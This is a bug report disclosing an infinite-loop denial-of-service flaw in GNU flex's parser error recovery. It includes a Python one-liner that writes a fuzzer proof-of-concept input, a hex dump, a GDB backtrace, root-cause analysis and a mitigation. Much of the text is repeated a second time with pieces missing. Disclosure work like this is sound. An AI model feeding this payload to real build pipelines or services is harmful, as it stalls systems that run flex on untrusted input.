- Overview
When flex parses a heavily malformed .l file containing specific non-ASCII bytes immediately following the %% section delimiter, the parser enters an infinite loop. The error handler at parse.y:1093 successfully catches the unrecognized token and prints "unrecognized rule", but fails to consume the invalid byte or advance the input stream. This results in a permanent CPU-bound loop, which poses a severe Denial of Service risk for automated CI/CD pipelines or web-services that run flex on untrusted/auto-generated grammar files.
- Environment
Target: GNU flex (master branch, latest commit)
OS: Linux (Ubuntu 22.04 / WSL)
Compiler: clang (Bug reproduces on standard builds without sanitizers)
- Reproduction Steps & Payload
The bug is triggered by a 131-byte minimized payload. The critical trigger is a non-ASCII byte (\x9a) injected directly into the Rules section immediately following the %%\n delimiter.
Generating the Payload (poc_endless.l):
To ensure exact byte replication, use the following Python one-liner to reconstruct the fuzzer's payload:
python3 -c 'import sys; sys.stdout.buffer.write(bytes.fromhex("77695e6e45676967696e286e286e7b77697d0a2e4567747261222e200a202020576520627566002045676967696e286e7b77696e280a2e7c617f7029737b7b7b7b7b7b7b7b7b7b7b7b7b392020670a25250a639a67696e286c6f45676967696e286e286e7b77697d0a2e4567692e4567696e286e7b77697d0a2e7c5c377b011020797962"))' > poc_endless.l
Artefact A: Hex Dump of the Minimized Payload:
00000000: 7769 5e6e 4567 6967 696e 286e 286e 7b77 wi^nEgigin(n(n{w
00000010: 697d 0a2e 4567 7472 6122 2e20 0a20 2020 i}..Egtra". .
00000020: 5765 2062 7566 0020 4567 6967 696e 286e We buf. Egigin(n
00000030: 7b77 696e 280a 2e7c 617f 7029 737b 7b7b {win(..|a.p)s{{{
00000040: 7b7b 7b7b 7b7b 7b7b 7b7b 3920 2067 0a25 {{{{{{{{{{9 g.%
00000050: 250a 639a 6769 6e28 6c6f 4567 6967 696e %.c.gin(loEgigin
00000060: 286e 286e 7b77 697d 0a2e 4567 692e 4567 (n(n{wi}..Egi.Eg
00000070: 696e 286e 7b77 697d 0a2e 7c5c 377b 0110 in(n{wi}..|\7{..
00000080: 2079 7962 yyb
Triggering the Bug:
./src/flex poc_endless.l
Observed Result:
flex pegs the CPU to 100% and infinitely prints:
poc_endless.l:6: unrecognized rule
poc_endless.l:6: unrecognized rule
poc_endless.l:6: unrecognized rule
...
- Root Cause Analysis & GDB Trace
When trapped with GDB (gdb --args ./src/flex poc_endless.l), the execution backtrace reveals a classic Lexer/Parser Desynchronization.
Artefact B: GDB Backtrace at execution halt (SIGINT)
#0 0x00007ffff7d1c5a4 in __GI___libc_write (fd=2, buf=0x7fffffffd5a0, nbytes=31)
#1 0x00007ffff7c93975 in _IO_new_file_write (f=0x7ffff7e044e0 <_IO_2_1_stderr_>, data=0x7fffffffd5a0, n=31)
...
#7 0x00007ffff7c6b743 in __vfprintf_internal (s=0x7ffff7e044e0 <_IO_2_1_stderr_>, format=0x55555579d1c0 <str> "%s:%d: %s\n", ap=0x7fffffffd670, mode_flags=0)
#8 0x000055555563a33d in __interceptor_fprintf ()
#9 0x000055555572c83d in yyparse () at /home/user/fuzz_flex/flex/src/parse.y:1093
#10 0x000055555570ffeb in readin () at main.c:1199
#11 0x000055555570d045 in flex_main (argc=2, argv=0x7fffffffdb28) at main.c:167
Analysis:
At byte 0x0000004e, the parser successfully processes the %%\n block delimiter, transitioning the state machine from the Definitions block into the Rules block.
Immediately following the delimiter (line 6), the lexer (scan.l) encounters a sequence it cannot resolve into a valid token (c\x9a...).
The lexer falls back to a catch-all/error state and passes an error token up to yyparse().
The Bison grammar handler in parse.y (around line 1093) successfully catches this token, executing the error routine which prints unrecognized rule.
The Failure: After the error routine executes, the state machine attempts to resume parsing. However, neither scan.l nor parse.y consumed the invalid \x9a byte or advanced the file pointer (yytext/yyleng).
On the next iteration of the yyparse() loop, the lexer reads the exact same byte, yields the exact same error token, and traps the compiler in a zero-length advancement loop.
Suggested Mitigation:
Ensure that the error recovery block for unrecognized rules forcefully advances the input stream by at least one character (e.g., consuming the offending byte) before yielding control back to the parser, breaking the zero-advancement cycle.
When flex parses a heavily malformed .l file containing specific non-ASCII bytes immediately following the %% section delimiter, the parser enters an infinite loop. The error handler at parse.y:1093 successfully catches the unrecognized token and prints "unrecognized rule", but fails to consume the invalid byte or advance the input stream. This results in a permanent CPU-bound loop, which poses a severe Denial of Service risk for automated CI/CD pipelines or web-services that run flex on untrusted/auto-generated grammar files.
Target: GNU flex (master branch, latest commit)
OS: Linux (Ubuntu 22.04 / WSL)
Compiler: clang (Bug reproduces on standard builds without sanitizers)
The bug is triggered by a 131-byte minimized payload. The critical trigger is a non-ASCII byte (\x9a) injected directly into the Rules section immediately following the %%\n delimiter.
Generating the Payload (poc_endless.l):
To ensure exact byte replication, use the following Python one-liner to reconstruct the fuzzer's payload:
python3 -c 'import sys; sys.stdout.buffer.write(bytes.fromhex("77695e6e45676967696e286e286e7b77697d0a2e4567747261222e200a202020576520627566002045676967696e286e7b77696e280a2e7c617f7029737b7b7b7b7b7b7b7b7b7b7b7b7b392020670a25250a639a67696e286c6f45676967696e286e286e7b77697d0a2e4567692e4567696e286e7b77697d0a2e7c5c377b011020797962"))' > poc_endless.lArtefact A: Hex Dump of the Minimized Payload:
Triggering the Bug:
./src/flex poc_endless.lObserved Result:
flex pegs the CPU to 100% and infinitely prints:
When trapped with GDB (gdb --args ./src/flex poc_endless.l), the execution backtrace reveals a classic Lexer/Parser Desynchronization.
Artefact B: GDB Backtrace at execution halt (SIGINT)
Analysis:
At byte 0x0000004e, the parser successfully processes the %%\n block delimiter, transitioning the state machine from the Definitions block into the Rules block.
Immediately following the delimiter (line 6), the lexer (scan.l) encounters a sequence it cannot resolve into a valid token (c\x9a...).
The lexer falls back to a catch-all/error state and passes an error token up to yyparse().
The Bison grammar handler in parse.y (around line 1093) successfully catches this token, executing the error routine which prints unrecognized rule.
The Failure: After the error routine executes, the state machine attempts to resume parsing. However, neither scan.l nor parse.y consumed the invalid \x9a byte or advanced the file pointer (yytext/yyleng).
On the next iteration of the yyparse() loop, the lexer reads the exact same byte, yields the exact same error token, and traps the compiler in a zero-length advancement loop.
Suggested Mitigation:
Ensure that the error recovery block for unrecognized rules forcefully advances the input stream by at least one character (e.g., consuming the offending byte) before yielding control back to the parser, breaking the zero-advancement cycle.